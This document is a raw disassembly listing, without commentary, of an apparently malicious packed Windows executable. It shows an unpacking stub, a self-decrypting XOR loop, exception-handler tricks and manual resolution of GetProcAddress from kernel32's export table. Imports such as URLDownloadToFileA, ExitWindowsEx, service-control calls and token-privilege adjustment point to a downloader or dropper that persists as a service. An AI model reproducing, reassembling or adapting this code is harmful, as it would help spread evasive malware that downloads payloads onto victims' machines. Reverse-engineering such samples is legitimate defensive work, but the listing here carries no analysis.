dword_4076A8 dd 0 ; seg000:00402932�w
dword_4076AC dd 0 dword_4076B0 dd 0 dword_4076B4 dd 0 dword_4076B8 dd 0 dword_4076BC dd 0FFFFFFFFh dword_4076C0 dd 0FFFFFFFFh dword_4076C4 dd 0 dd 24Eh dup(0)
dd 0E0h, 3060h, 74654701h, 7473614Ch, 6F727245h, 49010072h
dd 7265746Eh, 6B636F6Ch, 65446465h, 6D657263h, 746E65h
dd 6F6C4701h, 416C6162h, 636F6C6Ch, 6C470100h, 6C61626Fh
dd 65657246h, 704F0100h, 72506E65h, 7365636Fh, 47010073h
dd 69467465h, 7441656Ch, 62697274h, 73657475h, 53010041h
dd 69467465h, 7441656Ch, 62697274h, 73657475h, 47010041h
dd 6F4D7465h, 656C7564h, 646E6148h, 41656Ch, 6D6E5501h
dd 69567061h, 664F7765h, 656C6946h, 72430100h, 65746165h
dd 6574754Dh, 1004178h, 65746E49h, 636F6C72h, 4964656Bh
dd 6572636Eh, 746E656Dh, 6F4C0100h, 416C6163h, 636F6C6Ch
dd 6F4C0100h, 466C6163h, 656572h, 74654701h, 73726556h
dd 6E6F69h, 74654701h, 73726556h, 456E6F69h, 1004178h
dd 43746547h, 65727275h, 7250746Eh, 7365636Fh, 47010073h
dd 454F7465h, 50434Dh, 74654701h, 74737953h, 65446D65h
dd 6C756166h, 49434C74h, 47010044h, 6F4D7465h, 656C7564h
dd 656C6946h, 656D614Eh, 54010041h, 696D7265h, 6574616Eh
dd 636F7250h, 737365h, 69615701h, 726F4674h, 676E6953h
dd 624F656Ch, 7463656Ah, 6F430100h, 69467970h, 41656Ch
dd 74654701h, 61636F4Ch, 6D69546Ch, 45010065h, 50746978h
dd 65636F72h, 1007373h, 54746547h, 436B6369h, 746E756Fh
dd 72430100h, 65746165h, 65726854h, 1006461h, 65656C53h
dd 46010070h, 43656572h, 6F736E6Fh, 100656Ch, 53746547h
dd 65747379h, 7269446Dh, 6F746365h, 417972h, 65724301h
dd 54657461h, 686C6F6Fh, 33706C65h, 616E5332h, 6F687370h
dd 50010074h, 65636F72h, 32337373h, 73726946h, 50010074h
dd 65636F72h, 32337373h, 7478654Eh, 6C430100h, 4865736Fh
dd 6C646E61h, 43010065h, 74616572h, 6F725065h, 73736563h
dd 44010041h, 74656C65h, 6C694665h, 4165h, 0EDh, 3000h
dd 61684301h, 5365676Eh, 69767265h, 6F436563h, 6769666Eh
dd 1004132h, 72657551h, 72655379h, 65636976h, 666E6F43h
dd 41326769h, 74530100h, 53747261h, 69767265h, 416563h
dd 6C654401h, 53657465h, 69767265h, 1006563h, 69676552h
dd 72657473h, 76726553h, 43656369h, 486C7274h, 6C646E61h
dd 417265h, 74655301h, 76726553h, 53656369h, 75746174h
dd 53010073h, 74726174h, 76726553h, 43656369h, 446C7274h
dd 61707369h, 65686374h, 1004172h, 72657551h, 72655379h
dd 65636976h, 74617453h, 1007375h, 72657551h, 72655379h
dd 65636976h, 666E6F43h, 416769h, 61684301h, 5365676Eh
dd 69767265h, 6F436563h, 6769666Eh, 41010041h, 73756A64h
dd 6B6F5474h, 72506E65h, 6C697669h, 73656765h, 704F0100h
dd 43536E65h, 616E614Dh, 41726567h, 72430100h, 65746165h
dd 76726553h, 41656369h, 6C430100h, 5365736Fh, 69767265h
dd 61486563h, 656C646Eh, 704F0100h, 65536E65h, 63697672h
dd 1004165h, 4F676552h, 4B6E6570h, 78457965h, 52010041h
dd 6C436765h, 4B65736Fh, 1007965h, 6E65704Fh, 636F7250h
dd 54737365h, 6E656B6Fh, 6F4C0100h, 70756B6Fh, 76697250h
dd 67656C69h, 6C615665h, 416575h, 0FA00h, 305000h, 63490100h
dd 6C43706Dh, 4865736Fh, 6C646E61h, 49010065h, 43706D63h
dd 74616572h, 6C694665h, 49010065h, 53706D63h, 45646E65h
dd 6F6863h, 10300h, 30F000h, 78650100h, 1007469h, 7063585Fh
dd 6C694674h, 726574h, 675F5F01h, 616D7465h, 72616E69h
dd 1007367h, 696E695Fh, 72657474h, 7301006Dh, 74737274h
dd 73010072h, 646E6172h, 3F3F0100h, 41594032h, 49584150h
dd 1005A40h, 5F705F5Fh, 6E695F5Fh, 6E657469h, 5F010076h
dd 7465735Fh, 72657375h, 6874616Dh, 727265h, 64615F01h
dd 7473756Ah, 6964665Fh, 5F010076h, 5F5F705Fh, 6D6D6F63h
dd 65646Fh, 72707301h, 66746E69h, 74730100h, 68637272h
dd 5F010072h, 5F5F705Fh, 646F6D66h, 5F010065h, 7465735Fh
dd 7070615Fh, 7079745Fh, 5F010065h, 65637865h, 685F7470h
dd 6C646E61h, 337265h, 6F635F01h, 6F72746Eh, 70666Ch, 78655F01h
dd 1007469h, 40333F3Fh, 50584159h, 5A405841h, 61720100h
dd 100646Eh, 7274735Fh, 706D6369h, 10E0000h, 319C0000h
dd 55010000h, 6F444C52h, 6F6C6E77h, 6F546461h, 656C6946h
dd 19000041h, 48000001h, 1000031h, 74697845h, 646E6957h
dd 4573776Fh, 24000078h, 50000001h, 0FF000031h, 4FF0017h
dd 39FF00h, 0FF000CFFh, 15FF0034h, 13FF00h, 0FF0010FFh
dd 9FF0003h, 2FF00h, 0FF0074FFh, 1FF000Dh, 8FF00h, 0FF0073FFh
dd 0BFF000Eh, 0
dd 45500000h, 14C0000h, 20080003h, 9A08h, 0
dd 0E00000h, 10B010Fh, 30000006h, 40000000h, 0
dd 2FCC0000h, 10000000h, 40000000h, 0
dd 10000040h, 10000000h, 40000h, 0
dd 40000h, 0
dd 80000000h, 10000000h, 0
dd 30000h, 0
dd 10000010h, 0
dd 10000010h, 0
dd 100000h, 2 dup(0)
dd 41B40000h, 0A00000h, 14h dup(0)
dd 40000000h, 1A40000h, 6 dup(0)
dd 742E0000h, 747865h, 213A0000h, 10000000h, 30000000h
dd 10000000h, 3 dup(0)
dd 200000h, 722E6000h, 61746164h, 9B00000h, 40000000h
dd 10000000h, 40000000h, 3 dup(0)
dd 400000h, 642E4000h, 617461h, 26C80000h, 50000000h, 20000000h
dd 50000000h, 3 dup(0)
dd 400000h, 7000C000h, 43F80000h, 2 dup(755E0000h), 8DD71262h
dd 0CECF74AAh, 0BA612C8h, 0C097F36Bh, 91ED3F6Ah, 5E1AC6C0h
dd 0D97BDC9Dh, 70B7FFFEh, 5412C707h, 9ABDDF12h, 9A78485Ah
dd 0FF50AA58h, 850D9112h, 7B5ADFFFh, 0E9B7858h, 63120853h
dd 5F1A6E12h, 0F3491297h, 37DAC09Ah, 0ED71DCD8h, 60940C6Eh
dd 0C365CE66h, 0FFFEEF68h, 75F812F9h, 0F36D12DDh, 9D10C089h
dd 0C9627B17h, 0F398F300h, 0BDB2FF9Bh, 216D226Dh, 2A1C710h
dd 5EFFD9A5h, 9898B5DFh, 0FEC5BFFBh, 0C989DE14h, 2159AACFh
dd 0A5CE1403h, 0F4FA9B5Eh, 0D9CB99FDh, 7EDFB9BBh, 9E5E71CEh
dd 5E9B499Bh, 0FA9DDEh, 13CACE4Ch, 6EBADFDAh, 1B650361h
dd 1C353275h, 0C860EC59h, 0CBEDFF78h, 0C34B11DFh, 777B32C0h
dd 669A715Ah, 0EDFCDE00h, 0FAF6EBC9h, 6F7BBFD8h, 0EBFDFDFFh
dd 99EAEAFCh, 0EDF805DAh, 0D80D11FCh, 0F0E1DC99h, 0DDBFDBEDh
dd 13F1CDDCh, 4F6D563h, 0EBFBF0D5h, 17E0EBF8h, 0BB797FEEh
dd 0C6ABEAFDh, 6399ABAAh, 0F229CAD8h, 0F6FAEDFCh, 0FAFCF7F7h
dd 6FB58D24h, 0F6F5FADFh, 99143AEAh, 0D23F2057h, 0B72D20C8h
dd 0C2A88h, 81268002h, 0C8C28F7h, 2F84BF07h, 4DD137F1h
dd 642079D2h, 61636C6Ch, 745C65C2h, 0D1BFA37Dh, 2E347466h
dd 20657865h, 5C732877h, 0E9987673h, 6F14B12Bh, 0DE0A10D3h
dd 0F3D01C13h, 4C4C44FFh, 54534F48h, 4558452Eh, 0EEF9149Ah
dd 544985BDh, 500B5338h, 68637461h, 0C5B656F7h, 495A7241h
dd 0EDFFB300h, 3D3D9F2Fh, 0D2CB00CAh, 0DAD3D3D2h, 2FDCDBDAh
dd 62E607D6h, 47773463h, 68525445h, 20FE2D8Bh, 50545448h
dd 6031D32Fh, 6F46A341h, 7495D054h, 29E8203Ah, 85A8DB07h
dd 0A2C0980h, 716D2D78h, 6278F2D8h, 10707469h, 1667AF6Ah
dd 0B8767DBh, 2F2A0C70h, 0B355412Ah, 0F6DD5B6Fh, 14412D72h
dd 0ED4D456Eh, 2F616F69h, 0E154AD34h, 28202E42h, 0FEBE350Eh
dd 0B446A16Dh, 53183B06h, 35204549h, 0BF17352Eh, 5709DB51h
dd 73773A94h, 0FC383920h, 5CD7B685h, 0C3359948h, 0DA67430Bh
dd 6EA190CDh, 4B116E30h, 15A89465h, 7B53D46Ah, 0FA35177Fh
dd 0DF0467B2h, 20492000h, 0D6EA5B7Ah, 6D2019BDh, 766E179h
dd 62222026h, 6D42B90Bh, 7E293A7Bh, 765F2000h, 2EC76E78h
dd 584315B5h, 4E116E61h, 6563546Fh, 5D0B7368h, 34DC3220h
dd 4220A032h, 605B36EFh, 6CBB416Dh, 0CC8F3866h, 6FF6EDB5h
dd 7A437272h, 76677D68h, 88686F36h, 0B1480C22h, 0EA982D74h
dd 2F3A765Eh, 0AE6EBE2Fh, 85B96D80h, 0CA56A856h, 712E8C38h
dd 93FB51BDh, 2F362F16h, 5352F39h, 3764375Ah, 1BFC2FF5h
dd 62662D59h, 342D6137h, 622D39B7h, 2D366531h, 2AB7D1B0h
dd 36627A3Fh, 326C6632h, 0A105DFC2h, 30980C27h, 38424B2Dh
dd 0C0153332h, 8B76F0Eh, 4B253878h, 73B1524Fh, 0A5BDB52Fh
dd 662F386Fh, 37C83805h, 72FD3631h, 2D31FDD9h, 33626438h
dd 35346673h, 35613037h, 2BE46236h, 3904BDACh, 73803864h
dd 0F6544843h, 322266B7h, 31380531h, 66643063h, 5ADED53Eh
dd 323737FBh, 4C037362h, 0F6323139h, 3D4DB590h, 65536254h
dd 0DF731839h, 5376113Ch, 312F30E7h, 64663130h, 2F6B6D64h
dd 663034FFh, 6366652Dh, 64333335h, 0EC321CF1h, 856B6DB0h
dd 65175C34h, 73350534h, 0AF90891Bh, 0EE554E45h, 742B6D33h
dd 33657577h, 0C5325C31h, 0FF4735EAh, 7C685706h, 335B73DAh
dd 65313865h, 8353462h, 35E49C21h, 50586634h, 639B0CDh
dd 47335B42h, 43723641h, 33ED0D6Bh, 355B4864h, 5DB63730h
dd 6361F280h, 32336932h, 840733ECh, 38D8461Dh, 0C773CD73h
dd 615DD68Eh, 2B033501h, 0BB433064h, 3379470Eh, 44383361h
dd 35EC344Dh, 860AC265h, 6564590Bh, 0EB73EE02h, 53B90A18h
dd 5624339h, 46ED6B5Ah, 0D666329h, 35086C64h, 0E7EB4075h
dd 2D6D7338h, 0AC233539h, 1D252B70h, 73F16633h, 92D03FFh
dd 207100CDh, 2520692Dh, 23C2073h, 6567F203h, 6E202074h
dd 80435653h, 2F96CAC0h, 8062D629h, 0CF9E20C0h, 0EB2DBE24h
dd 6B2677D6h, 5338A920h, 0F0726168h, 2BDD80D6h, 6C0067h
dd 435444ECh, 4CD0246Fh, 13FA4207h, 256EF6Ah, 49572BC6h
dd 0A158534Eh, 7AD03580h, 41770046h, 6E02B258h, 4B60F372h
dd 0B6CB2C1Bh, 6E2DB71Bh, 717A6F02h, 18DB5D6Dh, 762A532Fh
dd 6B5F50ECh, 9ED5A36Eh, 78797358h, 633E2CECh, 817B605Ah
dd 6F65BC54h, 0F36FE875h, 31EDB475h, 6365EDD8h, 55617254h
dd 6ED83566h, 752D2C1Dh, 750A7309h, 3046136Ch, 1D36F730h
dd 0A31F6144h, 96E08604h, 0D0CFE320h, 370425C0h, 4D0FE31Fh
dd 0B9706020h, 0E706EC6Ah, 371B6C1Ah, 4710011Ch, 0BBC0CDE0h
dd 542DEF74h, 0A9E7079h, 6D2F7478h, 4E95976Fh, 67046C17h
dd 33196874h, 683F6FC2h, 58590641h, 45530001h, 0ADC55241h
dd 0C2835ED0h, 0CE7DECBBh, 1F0AD685h, 0F683504Bh, 0EC9DC52Eh
dd 4F136DB6h, 452257BCh, 555CA05Ch, 0B6850618h, 3A4F61C0h
dd 0BC61D879h, 500941D1h, 455C32h, 0C845AF33h, 0A793114h
dd 357496AFh, 0CB6E4F35h, 40266C60h, 634B6E1Ch, 0C7C1D766h
dd 8E6769C2h, 0C6204E61h, 366E4575h, 20518EC7h, 6D2B1044h
dd 30205049h, 1C970D19h, 2E9D7264h, 580F2507h, 2D70DB04h
dd 5F2B0D64h, 0C4B0754Dh, 7B480C31h, 617A736Dh, 8360A970h
dd 0D10C00AEh, 96893131h, 9B439212h, 6B276E34h, 24411EDh
dd 492DDA0Eh, 0D68518BDh, 0B41A5349h, 422001D3h, 4030C80h
dd 88580101h, 42A8CB00h, 0A5FAE052h, 0FC0B1432h, 74654701h
dd 0FB60054Ch, 724544ADh, 0D726F72h, 4A00A549h, 6C72FFC1h
dd 656B636Fh, 63654464h, 0B7EE6152h, 1123BBE6h, 416C6162h
dd 400C186Ch, 46DB6EDBh, 4F0B651Bh, 38501F70h, 1CC6005Fh
dd 0B0464964h, 72747441h, 0F6CB256Fh, 74756269h, 27534113h
dd 0F6FB9B82h, 75646F4Dh, 6E614815h, 55111B64h, 0F7B6D06Eh
dd 695693B7h, 664F7765h, 5D43102Dh, 2AAFB09h, 9441F676h
dd 0C936B25Eh, 104C6E49h, 22C0B93h, 5D92CDF4h, 330BE156h
dd 450F6701h, 24437878h, 1FD8C03Dh, 454FB358h, 950434Dh
dd 0DDA17B53h, 66F7574Eh, 43149C61h, 0BDAB4449h, 97017F7Dh
dd 0AD6D614Eh, 696D5254h, 9ED0B06Eh, 57459FCCh, 3EE66961h
dd 0B780B553h, 4F25E202h, 36486A62h, 0C3C20D7Bh, 0A1783539h
dd 3CCDB096h, 8B6D6954h, 0DD158069h, 0D9B5B7B3h, 0F7D3752Ch
dd 64066854h, 0C825B5Eh, 670B13Ch, 5C3B2FD7h, 6F733E02h
dd 7269A619h, 73764DBFh, 41797466h, 68216F36h, 33706C65h
dd 0DBEE60B5h, 709D5332h, 506F6873h, 1C2B1267h, 789A158h
dd 6F594E0Fh, 0C2C20B36h, 4586733Dh, 82B5ACD4h, 1508554Bh
dd 6DB7C20Fh, 0ED00F152h, 2E68250Ch, 7D6567h, 43930167h
dd 0A7E432E9h, 512CDB6Ch, 15791175h, 72617453h, 4B377B74h
dd 700F5116h, 69676552h, 31B671CAh, 233672ACh, 85728B6Ch
dd 399B05DDh, 75744417h, 50134C73h, 442BBE82h, 21651E80h
dd 7F2E3D9Bh, 86FC9330h, 0BF417604h, 6A644141h, 31747375h
dd 62A34059h, 46127377h, 53DF9E02h, 6872DF43h, 5961D86Ch
dd 0BA0E3FD0h, 0D9B2DCFEh, 10E32133h, 9079654Bh, 823DEC5Ch
dd 3D0F330Eh, 9623DB92h, 7581C779h, 61E69F70h, 75325663h
dd 4950FA7Ch, 12F66963h
dd 0B3706DC2h, 46389410h, 0F37B5B0h, 9D451B7Ch, 0B72CF1CDh
dd 0F0010337h, 68057265h, 5FF4E19Dh, 8E706358h, 5F5F0C72h
dd 8B476EB5h, 6772C80Ah, 0CE085FE9h, 22AEB42Dh, 70A6D18h
dd 0FB070272h, 72B9BFFEh, 3F3F0664h, 41594032h, 49584150h
dd 70365A40h, 0B6F68602h, 76652C58h, 116B8B0Eh, 3773433Eh
dd 61578882h, 6082364Ah, 64665FEDh, 6D392EC4h, 95C15A36h
dd 0D9AF9D44h, 0CC1B66E6h, 1262C510h, 0BD1D661Fh, 4B362DB7h
dd 7411703Eh, 770F7079h, 0B5A22EC6h, 13685FC7h, 0A3771133h
dd 39590215h, 1D7066E5h, 0BDD35CF6h, 58339DD3h, 2CB19D9Eh
dd 476D5C18h, 0E00086Dh, 0D9BC1598h, 5255319Ch, 0E99F444Ch
dd 6A518374h, 481C19D2h, 9B5B390h, 170AE0C1h, 0B6596524h
dd 17FF504Dh, 0C390402h, 96596596h, 10131534h, 96590903h
dd 74025965h, 0F208010Dh, 73659604h, 50710B0Eh, 92FE8045h
dd 3014CFFh, 8200800h, 0B010F9Ah, 41660601h, 4052C6CFh
dd 0BE2FCC13h, 0F7D9E764h, 0F10040Fh, 5B070004h, 17B67406h
dd 0CB0C3180h, 10EC0DE0h, 0BA360607h, 0B4CB2101h, 0A4A2A041h
dd 8C2B829h, 85F02E26h, 79DB06Ch, 3090213Ah, 8F052D98h
dd 2E609501h, 29611072h, 53B9309Bh, 6A0309B0h, 0DEECD3BDh
dd 3C262E40h, 75026C8h, 94E1B6E5h, 0EB00C027h, 5E0343F8h
dd 75h, 4800000h, 0FF00h, 3 dup(0)
; ---------------------------------------------------------------------------
pusha
mov esi, offset dword_407000
lea edi, [esi-6000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_409082
; ---------------------------------------------------------------------------
align 8
loc_409078: ; CODE XREF: seg001:loc_409089�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_40907E: ; CODE XREF: seg001:00409116�j
; seg001:0040912D�j
add ebx, ebx
jnz short loc_409089
loc_409082: ; CODE XREF: seg001:00409070�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_409089: ; CODE XREF: seg001:00409080�j
jb short loc_409078
mov eax, 1
loc_409090: ; CODE XREF: seg001:0040909F�j
; seg001:004090AA�j
add ebx, ebx
jnz short loc_40909B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40909B: ; CODE XREF: seg001:00409092�j
adc eax, eax
add ebx, ebx
jnb short loc_409090
jnz short loc_4090AC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_409090
loc_4090AC: ; CODE XREF: seg001:004090A1�j
xor ecx, ecx
sub eax, 3
jb short loc_4090C0
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_409132
mov ebp, eax
loc_4090C0: ; CODE XREF: seg001:004090B1�j
add ebx, ebx
jnz short loc_4090CB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4090CB: ; CODE XREF: seg001:004090C2�j
adc ecx, ecx
add ebx, ebx
jnz short loc_4090D8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4090D8: ; CODE XREF: seg001:004090CF�j
adc ecx, ecx
jnz short loc_4090FC
inc ecx
loc_4090DD: ; CODE XREF: seg001:004090EC�j
; seg001:004090F7�j
add ebx, ebx
jnz short loc_4090E8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4090E8: ; CODE XREF: seg001:004090DF�j
adc ecx, ecx
add ebx, ebx
jnb short loc_4090DD
jnz short loc_4090F9
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_4090DD
loc_4090F9: ; CODE XREF: seg001:004090EE�j
add ecx, 2
loc_4090FC: ; CODE XREF: seg001:004090DA�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_40911C
loc_40910D: ; CODE XREF: seg001:00409114�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_40910D
jmp loc_40907E
; ---------------------------------------------------------------------------
align 4
loc_40911C: ; CODE XREF: seg001:0040910B�j
; seg001:00409129�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_40911C
add edi, ecx
jmp loc_40907E
; ---------------------------------------------------------------------------
loc_409132: ; CODE XREF: seg001:004090BC�j
pop esi
mov edi, esi
mov ecx, 5Dh
loc_40913A: ; CODE XREF: seg001:00409141�j
; seg001:00409146�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_40913F: ; CODE XREF: seg001:00409164�j
cmp al, 1
ja short loc_40913A
cmp byte ptr [edi], 1
jnz short loc_40913A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_40913F
lea edi, [esi+7000h]
loc_40916C: ; CODE XREF: seg001:0040918E�j
mov eax, [edi]
or eax, eax
jz short loc_4091B7
mov ebx, [edi+4]
lea eax, [eax+esi+9000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+90A0h]
xchg eax, ebp
loc_409189: ; CODE XREF: seg001:004091AF�j
mov al, [edi]
inc edi
or al, al
jz short loc_40916C
mov ecx, edi
jns short near ptr loc_40919A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_40919A: ; CODE XREF: seg001:00409192�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+90A4h]
or eax, eax
jz short loc_4091B1
mov [ebx], eax
add ebx, 4
jmp short loc_409189
; ---------------------------------------------------------------------------
loc_4091B1: ; CODE XREF: seg001:004091A8�j
call dword ptr [esi+90A8h]
loc_4091B7: ; CODE XREF: seg001:00409170�j
popa
jmp loc_402FCC
; ---------------------------------------------------------------------------
align 1000h
seg001 ends
; Section 3. (virtual address 0000A000)
; Virtual size : 00008000 ( 32768.)
; Section size in file : 00008000 ( 32768.)
; Offset to raw data for section: 0000A000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
seg002 segment para public 'CODE' use32
assume cs:seg002
;org 40A000h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
dd 3 dup(0)
dd 0A0E0h, 0A0A0h, 3 dup(0)
dd 0A0EDh, 0A0B0h, 3 dup(0)
dd 0A0FAh, 0A0B8h, 3 dup(0)
dd 0A103h, 0A0C0h, 3 dup(0)
dd 0A10Eh, 0A0C8h, 3 dup(0)
dd 0A119h, 0A0D0h, 3 dup(0)
dd 0A124h, 0A0D8h, 5 dup(0)
dword_40A0A0 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA dd 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 76D64B79h, 0
dd 77C39E7Eh, 0
dd 42D779A3h, 0
dd 7E45A045h, 0
dd 71AB2BF4h, 0
db 4Bh ; K
db 45h, 52h, 4Eh
db 45h ; E
db 4Ch, 33h, 32h
db 2Eh ; .
db 44h, 2 dup(4Ch)
db 0
db 41h, 44h, 56h
db 41h ; A
db 50h, 49h, 33h
db 32h ; 2
db 2Eh, 64h, 6Ch
db 6Ch ; l
align 2
dw 4349h
db 4Dh ; M
db 50h, 2Eh, 64h
db 6Ch ; l
db 6Ch, 0, 4Dh
db 53h ; S
db 56h, 43h, 52h
db 54h ; T
db 2Eh, 64h, 6Ch
db 6Ch ; l
align 2
dw 7275h
db 6Ch ; l
db 6Dh, 6Fh, 6Eh
db 2Eh ; .
db 64h, 2 dup(6Ch)
db 0
db 55h, 53h, 45h
db 52h ; R
db 33h, 32h, 2Eh
db 64h ; d
db 2 dup(6Ch), 0
db 57h ; W
db 53h, 32h, 5Fh
db 33h ; 3
db 32h, 2Eh, 64h
db 6Ch ; l
db 6Ch, 2 dup(0)
aLoadlibrarya db 'LoadLibraryA',0
align 2
aGetprocaddress db 'GetProcAddress',0
align 2
aExitprocess db 'ExitProcess',0
align 4
aRegclosekey db 'RegCloseKey',0
db 0
align 2
aIcmpsendecho db 'IcmpSendEcho',0
align 4
aExit db 'exit',0
align 2
aUrldownloadtof db 'URLDownloadToFileA',0
align 2
aExitwindowsex db 'ExitWindowsEx',0
dd 18h dup(0)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
push ebp
mov ebp, esp
call sub_40A21C
call sub_40A28B
push dword ptr fs:0
pop ebp
lea ebp, [ebp+8]
jmp loc_40A244
start endp
; =============== S U B R O U T I N E =======================================
sub_40A21C proc near ; CODE XREF: start+3�p
var_28 = dword ptr -28h
var_20 = dword ptr -20h
; FUNCTION CHUNK AT 0040A2B7 SIZE 0000010A BYTES
; FUNCTION CHUNK AT 0040A42F SIZE 0000000A BYTES
push dword ptr fs:0
mov fs:0, esp
xor ecx, ecx
push 80000000h
push 10000h
push ecx
push ecx
push ecx
push ecx
push 80000000h
push ecx
call ds:dword_40A0A0 ; LoadLibraryA
loc_40A244: ; CODE XREF: start+17�j
sub eax, eax
loc_40A246: ; CODE XREF: sub_40A21C+30�j
dec al
or al, al
jz short loc_40A250
jnz short loc_40A246
jmp short loc_40A2B7
; ---------------------------------------------------------------------------
loc_40A250: ; CODE XREF: sub_40A21C+2E�j
call sub_40A288
add edi, 43h
push edi
xor ebx, ebx
xor ebx, 243Ch
mov ecx, 0EFh
loc_40A269: ; CODE XREF: sub_40A21C+5A�j
xchg al, [edi]
xor ax, cx
xchg al, [edi]
inc edi
sub ebx, 1
or ebx, ebx
jnz short loc_40A269
pop edi
mov esp, fs:0
pop dword ptr fs:0
leave
jmp edi
sub_40A21C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40A288 proc near ; CODE XREF: sub_40A21C:loc_40A250�p
pop edi
jmp edi
sub_40A288 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40A28B proc near ; CODE XREF: start+8�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_40A28B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 90h
; ---------------------------------------------------------------------------
call $+5
mov eax, [esp]
test dword ptr [eax+242Bh], 80000000h
mov [eax+29ACh], ebx
mov ebx, [esp+4]
jz short loc_40A2E4
; START OF FUNCTION CHUNK FOR sub_40A21C
loc_40A2B7: ; CODE XREF: sub_40A21C+32�j
cld
pop ecx
mov [eax+29B0h], esi
mov [eax+29B4h], edi
cmp byte ptr [eax+242Fh], 0E8h
jnz short loc_40A2DB
add ebx, [eax+2430h]
mov ebx, [ebx+2]
push dword ptr [ebx]
jmp short loc_40A2E3
; ---------------------------------------------------------------------------
loc_40A2DB: ; CODE XREF: sub_40A21C+B0�j
mov ebx, [eax+2431h]
push dword ptr [ebx]
loc_40A2E3: ; CODE XREF: sub_40A21C+BD�j
pop ebx
loc_40A2E4: ; CODE XREF: seg002:0040A2B5�j
push ebp
xchg eax, ebp
sub [esp+24h+var_20], 123Eh
and ebx, 0FFFFF000h
sub ebp, offset sub_401006
mov edi, [esp+24h+var_20]
lea esi, dword_40343C[ebp]
mov ecx, 0
rep movsb
loc_40A30B: ; CODE XREF: sub_40A21C+10B�j
cmp dword ptr [ebx+4Eh], 73696854h
jnz short loc_40A321
mov eax, [ebx+3Ch]
lea eax, [eax+ebx]
cmp word ptr [eax], 4550h
jz short loc_40A329
loc_40A321: ; CODE XREF: sub_40A21C+F6�j
sub ebx, 100h
jnz short loc_40A30B
loc_40A329: ; CODE XREF: sub_40A21C+103�j
mov edx, [eax+78h]
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_40A337: ; CODE XREF: sub_40A21C:loc_40A35E�j
lodsd
add eax, ebx
cmp dword ptr [eax-1], 74654700h
jnz short loc_40A35E
cmp dword ptr [eax+3], 636F7250h
jnz short loc_40A35E
cmp dword ptr [eax+7], 72646441h
jnz short loc_40A35E
cmp dword ptr [eax+0Bh], 737365h
jz short loc_40A363
loc_40A35E: ; CODE XREF: sub_40A21C+125�j
; sub_40A21C+12E�j ...
loop loc_40A337
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40A363: ; CODE XREF: sub_40A21C+140�j
sub [esp+28h+var_28], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
call near ptr loc_40A389+2
inc ebx
insb
outsd
jnb short near ptr loc_40A3E7+2
dec eax
popa
outsb
db 64h
insb
loc_40A389: ; CODE XREF: sub_40A21C+15E�p
add gs:[ebx-1], dl
setalc
mov ss:dword_40353C[ebp], eax
call near ptr loc_40A3A5+1
inc ebx
jb short near ptr loc_40A400+1
popa
jz short near ptr loc_40A400+4
inc ebp
jbe short near ptr loc_40A406+1
outsb
jz short near ptr loc_40A3E4+2
loc_40A3A5: ; CODE XREF: sub_40A21C+178�p
add [ebx-1], dl
setalc
mov ss:dword_403540[ebp], eax
call sub_40A3C1
inc edi
db 65h
jz short near ptr loc_40A400+4
popa
jnb short loc_40A42F
inc ebp
jb short near ptr loc_40A42F+1
outsd
jb short $+2
; END OF FUNCTION CHUNK FOR sub_40A21C
; =============== S U B R O U T I N E =======================================
sub_40A3C1 proc near ; CODE XREF: sub_40A21C+193�p
; FUNCTION CHUNK AT 0040A46A SIZE 000000B1 BYTES
; FUNCTION CHUNK AT 0040A5AA SIZE 0000013A BYTES
push ebx
call esi ; CloseServiceHandle
mov ss:dword_403544[ebp], eax
call sub_40A43F
test eax, eax
jz short loc_40A3F4
push eax
call ss:dword_403544[ebp]
test eax, eax
jnz short loc_40A3EE
lea eax, [ebp+4011D2h]
loc_40A3E4: ; CODE XREF: sub_40A21C+187�j
mov dl, [eax-1]
loc_40A3E7: ; CODE XREF: sub_40A21C+166�j
call sub_40A45A
jmp short loc_40A46A
; ---------------------------------------------------------------------------
loc_40A3EE: ; CODE XREF: sub_40A3C1+1B�j
; sub_40A3C1+136�j ...
call ss:dword_40353C[ebp]
loc_40A3F4: ; CODE XREF: sub_40A3C1+10�j
test ss:dword_403431[ebp], 80000000h
jz short loc_40A41E
